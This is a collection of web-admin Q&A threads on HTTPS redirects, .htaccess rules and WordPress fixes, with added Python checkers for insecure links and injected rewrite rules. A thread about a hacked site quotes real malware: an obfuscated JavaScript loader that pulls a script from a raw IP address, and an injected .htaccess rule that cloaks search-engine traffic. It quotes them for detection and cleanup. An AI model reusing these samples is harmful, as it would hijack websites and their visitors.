Using HTTPS instead of HTTP - http

I have a website that users have to log in to. I want to use HTTPS to make a secure encrypted connection to the server to check the user name and password.
Currently on my server I have a folder called httpdocs, this is where my website is stored; I also have a folder called httpsdocs.
Now as I stated my website is stored in httpdocs, so logically I would go to http://website.com
But I found that if I go to https://website.com I get a secure connection to the pages stored in httpdocs.
Anyway, my question is, whenever I go to another link I lose the secure connection (URL goes back to http://). So how do I keep it all secure? Would I have to use the full URL in the href? Because that seems a bit lame instead of just using href=page2.php.
I'm new to this area of website developing, but I am experienced in developing if that helps you.
Thanks a bunch for the help.
Some basic tutorials or reading material would be awesome if anyone knows of anything good?
Thanks again.

To answer your question in the comments, you should use mod_rewrite (assuming it's enabled):
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://www.yourdomain.com/$1 [R,L]
That will send any webpage to HTTPS.

Do not use http://foo.com/path in urls, use //foo.com/path instead (or, even better, if you stay on the same server, use /path - it surely works). Doing full urls is bringing redundancy and brittleness. Avoid it.

Check out HTTP Strict Transport Security (HSTS):
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Basically, you can force the browser (unless it's IE<12) to always use HTTPS by adding this header to the secure site's configuration:
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains"
This can also be combined with a 301 (PERMANENT) redirect for the non-secure/HTTP site's configuration, also outlined on the above referenced site.
Additionally/Alternatively, you can set the base href on your "website.com" pages by adding something like this towards the top of the <head> tag:
<base href="https://website.com/">
This will set all relative urls on the page (including links, stylesheets, scripts, images, etc.) to use the HTTPS site's root as their base. Depending upon the structure and size of your site, however, you will want to verify for each page that its base href and/or the urls within the page include any necessary path information (i.e. subdirectories). Otherwise a link on http://website.com/some/directory/page.html that points to "otherpage.html" will direct to http://website.com/otherpage.html instead of http://website.com/some/directory/otherpage.html . In such cases you would want either a base href of "http://website.com/some/directory/" or the relative url in the link should point to either "/some/directory/page.html" or "some/directory/page.html" (no slash needed in this case).

Related

Redirect multiple links using htaccess

I have shifted my website from one place to another. I have high traffic in the first place, so I need to redirect it on specific pages mapping to the second place. There are almost one thousand articles, so I need one thousand redirections. How to do that through .htaccess?
I am using the .htaccess code described below for this purpose, but it is not working:
Redirect https://websiteOLD.example/article1 https://websiteNEW.example/article1
Redirect https://websiteOLD.example/article2 https://websiteNEW.example/article2
Redirect https://websiteOLD.example/article3 https://websiteNEW.example/article3
Redirect https://websiteOLD.example/article4 https://websiteNEW.example/article4
Redirect https://websiteOLD.example/article5 https://websiteNEW.example/article5
Redirect https://websiteOLD.example/article6 https://websiteNEW.example/article6
What's wrong with the above described code lines? I have almost one thousand of such lines mapping each WordPress article from old domain to the new domain.
I copied the website from one place and pasted it to other place.
If you've simply migrated your site from one domain to another then you just need a single mod_rewrite rule at the top of the .htaccess file to 301 redirect all URLs from the old domain to the new.
For example, the following would need to go before the # BEGIN WordPress comment marker.
RewriteEngine On
# Redirect any request that is NOT for example.com to example.com
RewriteCond %{HTTP_HOST} !=example.com
RewriteRule ^ https://example.com%{REQUEST_URI} [R=301,L]
Where example.com is the "new" canonical hostname.
The ! prefix on the above CondPattern negates the expression, so it is successful when the requested hostname does not match.
You do not need to repeat the RewriteEngine directive if this already occurs later in the file - it should already be part of the WordPress code block.
Test first with a 302 (temporary) redirect to avoid potential caching issues and make sure you've cleared your browser cache before testing.
You need to use mod_rewrite (ie. RewriteRule) as opposed to a mod_alias Redirect (or RedirectMatch) directive because:
The Redirect (and RedirectMatch) directives do not match the requested hostname. They match the URL-path only. (Which is why your attempt is not doing anything.)
As a general rule, if you are already using mod_rewrite in other parts of the config file (ie. in the WordPress code block) then you should be using mod_rewrite throughout in order to avoid potential conflicts.
What's wrong with the above described code lines? I have almost one thousand of such lines mapping each WordPress article from old domain to the new domain.
As mentioned above, the Redirect directive matches against the URL-path only. So, these directives will never match. See the Apache docs.
The directive you are trying to use is also a 302 (temporary) redirect. This needs to be a 301 (permanent) redirect in order to preserve SEO. (But, as mentioned, it is a good idea to test with a 302 first.)
Aside: However, you should avoid using 1000+ individual directives/redirects in the main .htaccess file (when there is no discernible pattern from the old to new URLs). The issue is that these directives are processed (unnecessarily) on every single request. You need to prioritise your normal site visitors, not the "old" redirect. Ideally, you would perform such redirects in your application, once it has been determined that these URLs don't exist in the current site (a WordPress plugin is suitable for this). Although, there are techniques you can use in .htaccess to prevent all these directives being processed on every request (ie. only processed when the old domain is requested, otherwise they are all skipped).

WordPress will not force SSL for the life of me

Hate to complain but I've spent like 2-3 hours working on trying to secure my WordPress site via SSL. I can successfully browse to my site via HTTPS, but I always get mixed content. I've tried several plugins, but there are still resources that are pulling images via HTTP. If I tried to browse to the URLs of those images manually, my web browser actually switches the URL to HTTPS, so I'm not sure why the site loads the images under HTTP but browsing to the images manually forces it over HTTPS. Very Confusing.
I've tried adding this in the .htaccess file of my root directory, so that all requests to the subdirectory /wp-content/ are forced over HTTPS, but it still does not work:
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^(wp-content/.*)$ https://www.example.com/$1 [R=301,L]
When I add this into the .htaccess file, reload the site, inspect element, I still see numerous links in here with http.
I've also tried HTTPS Easy Redirection, which forces HTTPS on everything but then results in a redirect loop. Still no luck.
Any suggestions would be greatly appreciated. It seems to just be the images.
What you have set up so far works, but does not address the root issue. As a matter of fact the .htaccess redirect is overkill.
Your WordPress configuration needs to be edited. Go to your settings>general, ensure that the WordPress Address URL and Site Address URL are https. It's that simple. You also need to edit any hard coded content URLs to https.
You could use some wacky plugin to mutate your links but I would not advise it. But it won't work all the time. That will depend on how your content is constructed.
If you want to play it safe, whenever you add a resource link to content simply omit the protocol like this: ://example.com/.... That scenario works well with content generated by Visual Composer and the likes.
If the SSL is successfully installed in your server then use this plugin: https://wordpress.org/plugins/really-simple-ssl/
This will work for you...
Note: Take a backup of your website and database first, then proceed with the above plugin.
Thanks
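An added example (not from any of the posts above) of checking a page for the problem discussed both in the first question and in this mixed-content thread: it resolves every href/src against the page URL and any `<base href>`, the way a browser would, and reports those that end up on http://. The function names, PAGE_URL and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

URL_ATTRS = {"href", "src", "action", "poster"}  # attributes the browser fetches or follows


class RefCollector(HTMLParser):
    """Collect URL-bearing attributes and the first <base href>, in document order."""

    def __init__(self, page_url):
        super().__init__()
        self.base, self.base_seen, self.refs = page_url, False, []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if tag == "base":
                if name == "href" and not self.base_seen:  # only the first <base> counts
                    self.base, self.base_seen = urljoin(self.base, value), True
            elif name in URL_ATTRS:
                self.refs.append((tag, value))


def find_insecure_refs(page_url, html):
    """Return (kind, raw, resolved) for every reference that resolves to http://."""
    collector = RefCollector(page_url)
    collector.feed(html)
    collector.close()
    findings = []
    for tag, raw in collector.refs:
        resolved = urljoin(collector.base, raw)  # same resolution the browser performs
        if urlsplit(resolved).scheme == "http":
            kind = "navigation" if tag in ("a", "form", "area") else "mixed-content"
            findings.append((kind, raw, resolved))
    return findings


# Constructed sample, imagined as served from PAGE_URL.
PAGE_URL = "https://website.com/some/directory/page.html"
SAMPLE_HTML = """
<link rel="stylesheet" href="/css/site.css">
<a href="page2.php">relative link</a>
<a href="http://website.com/login.php">hard-coded link</a>
<img src="//website.com/img/logo.png">
<img src="http://website.com/wp-content/uploads/photo.jpg">
"""

if __name__ == "__main__":
    for finding in find_insecure_refs(PAGE_URL, SAMPLE_HTML):
        print(finding)
```

Relative, root-relative and protocol-relative references inherit https from the page, so only the two hard-coded http:// URLs are reported; a `<base href>` that points at http:// would cause every relative reference to be reported as well.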

page redirect after Google search - Wordpress site hacked

We have the page domain.., and when you search at google.nl to Critical Alignment and click at the homepage of the site you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but can not find a redirect or anything.
Can someone help?
Have you checked if the redirect is made where the domain is hosted? Don't know what kind of host you use, but maybe the domain is set to redirect to that page from the host's side.
A good guide on what to do when your site gets hacked is this: http://codex.wordpress.org/FAQ_My_site_was_hacked
For your issue, check .htaccess first. There might be some redirect lines on the farthest right side of the file, so use the horizontal scroll bar.
Also, I would suggest to check with your host, since there might be many more files affected.
The same thing happened to me also.
First I thought it was a DNS hack problem, since it was a redirection problem. The hosting company responded to me that the DNS had no problems. They checked other common problems to find the source of the redirection and I was told that I had a malicious script in the header.php file, in the active theme folder.
I manually checked the file in cPanel and I found the script that caused the redirection. To read more about this check the article on IStartBlogging
A new virus is spreading that is abusing the xmlrpc.php of WordPress to inject itself into the server and replace the JavaScript files with its own contaminated copies.
If you see too many xmlrpc POST requests from a suspicious IP address, such as the below, verify the integrity of your JavaScript files.
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
One key feature of this virus is that it primarily targets the jQuery.js, replacing it with its own version (that, when users browse to your site, automatically redirects them to clickbait articles).
It achieves this by first posting new PHP files, such as recure.php, which usually contain obfuscated PHP code, or uploading WordPress plugins to the upload folder.
Most probably the attackers are trying to redirect the page to a different web site if the referred pages are google, yahoo, msn, aol, bing.
They will give back a frameset (similar to an iframe) when we request the pages from the above-specified referrals.
<frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
<frame src="http://remote_site_address_here" noresize="" scrolling="auto">
<link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>
So we will see our website name at the top of the address bar but the site content will be different. These are the common files that the hackers used to inject suspicious code.
index.php
index.html
header.php
footer.php
functions.php
theme files
.htaccess
Nowadays, recently infected cases show the malicious code injection in the .htaccess file. Here I am demonstrating the injected .htaccess file.
Open your .htaccess file in the web root directory, and you can see this configuration:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]
Here they are redirecting to the malicious PHP file emilie-amethyst.php if the referral pages are google|yahoo|msn|aol|bing. This is the reason for that redirect issue.
So you have to remove this redirection configuration from your .htaccess file and also remove the malicious script (in this case it is emilie-amethyst.php).
Try clicking the link from Google search. If you still see the problem, remove all cookies related to this particular site and retry. It should solve the issue.
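An added example (not part of the answers above) of how to look for the injected rule pattern shown in this thread: a RewriteRule guarded by RewriteCond lines that test the referer or user agent for search-engine names. It also reports the rule's indentation, since an earlier answer notes such lines can be pushed far to the right. The function name and the sample file are constructed; a hit is a prompt for manual review, not proof of compromise.

```python
import re

# Search-engine names the injected conditions on this page key on.
ENGINES = re.compile(r"google|yahoo|msn|aol|bing", re.I)
COND = re.compile(r"RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
RULE = re.compile(r"RewriteRule\s+(\S+)\s+(\S+)", re.I)


def find_cloaked_rewrites(text):
    """Return (line_no, tested_variables, target, indent) for each RewriteRule
    whose preceding conditions single out search-engine traffic."""
    findings, pending = [], set()
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()                       # ignore padding used to hide the rule
        indent = len(raw) - len(raw.lstrip())
        cond = COND.match(line)
        if cond and ENGINES.search(cond.group(2)):
            pending.add(cond.group(1).upper())
            continue
        rule = RULE.match(line)
        if rule:
            if pending:
                findings.append((no, sorted(pending), rule.group(2), indent))
            pending = set()                      # conditions apply to the next rule only
    return findings


# Constructed sample: a normal WordPress block followed by the injected
# block from this thread, pushed 200 columns to the right.
PAD = " " * 200
SAMPLE_HTACCESS = "\n".join([
    "# BEGIN WordPress",
    "RewriteEngine On",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteRule . /index.php [L]",
    "# END WordPress",
    PAD + "RewriteEngine On",
    PAD + "RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]",
    PAD + "RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)",
    PAD + "RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]",
])

if __name__ == "__main__":
    for finding in find_cloaked_rewrites(SAMPLE_HTACCESS):
        print(finding)
```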

Replace all URL's for my WordPress site using a different domain name?

The domain names used are only examples, so if you could use those example names in your answer that would be great. I'm having a very hard time wording exactly what I'm trying to do and because of that can't find the answer via searching, so I'm posting it as this analogy:
I work for a company that makes WordPress sites. We'll call that company SuperMedia, and their main website is supermedia.com. SuperMedia wants to host their clients' sites on their own server via subfolders. So in this case, we've created a client's WordPress site in the directory http://supermedia.com/greatclient/
The issue is that our client has a domain name, friendlyclient.com, and we need to link this domain name to their site which we are hosting on our server, but we don't want the urls to show "supermedia" at all.
So in simplest terms, right now all of our page urls look like this:
http://supermedia.com/greatclient/about
http://supermedia.com/greatclient/our-services
http://supermedia.com/greatclient/gallery
(etc...)
But we want them all to say:
http://friendlyclient.com/about
http://friendlyclient.com/our-services
http://friendlyclient.com/gallery
(etc...)
but still display the information on http://supermedia.com/greatclient/about, http://supermedia.com/greatclient/our-services, http://supermedia.com/greatclient/gallery, etc. respectively.
Is there a simple, fairly fast way to do this for all the pages we've created, either using .htaccess or some kind of plugin? I don't have a lot of back-end programming/database knowledge, so if it involves advanced programming, could you lay-out some steps on how I can achieve this?
If you are using Apache, you can use mod_rewrite to do the rewriting. Try adding this to your .htaccess file (in the friendlyclient.com root folder):
# Match the host
RewriteCond %{HTTP_HOST} ^([^\.]+)\.com$ [NC]
# proxy the entire request to the /host/ and path
RewriteRule ^(.*)$ http://www.supermedia.com/%1/$1 [L,P]
This will make it so requesting http://friendly.com/about will serve http://www.supermedia.com/friendlyclient/about, and don't forget to rename your folder from greatclient to friendlyclient.

IIS7: URL Rewrite - can it be used to hide a CDN path?

I am using Rackspace Cloud CDN (Limelight CDN) for my website. The URLs of the CDN are in the format
http://cxxxxxx.cdn.cloudfiles.rackspacecloud.com/something.jpg
My domain is mydomain.com.
Can I use IIS URL rewriting to show http://cxxxxxx.cdn.cloudfiles.rackspacecloud.com/something.jpg as http://images.mydomain.com/something.jpg? Or is this impossible without the CDN setup accepting my CNAME?
If so, can you please help create the URL rewrite rule? (Sorry, don't know how to use regular expressions)
Thanks,
WT
You cannot do this with a url rewrite rule, as that happens on your server.
One of the primary advantages of a CDN is to provide many points of access much closer to the user than your server may be. Using a round trip to your server completely destroys this advantage.
You can write a redirect rule to go from somewhere on your site that then sends the browser to the CDN, but the user will see the url of the CDN, (i.e. it won't be hidden).
To do so, consider something like
RewriteEngine On
RewriteRule ^/images/(.*)$ http://...cdn.....com/$1 [L,R=301]
If you're writing in a .htaccess file instead of in the server config file, then drop the first / after the ^.
As you alluded to, if you could get cloudfiles to accept a CNAME that pointed to their hostname, then it would be possible to simply replace your hostname with yours. However, I assume that by asking this question, you've already explored that avenue.
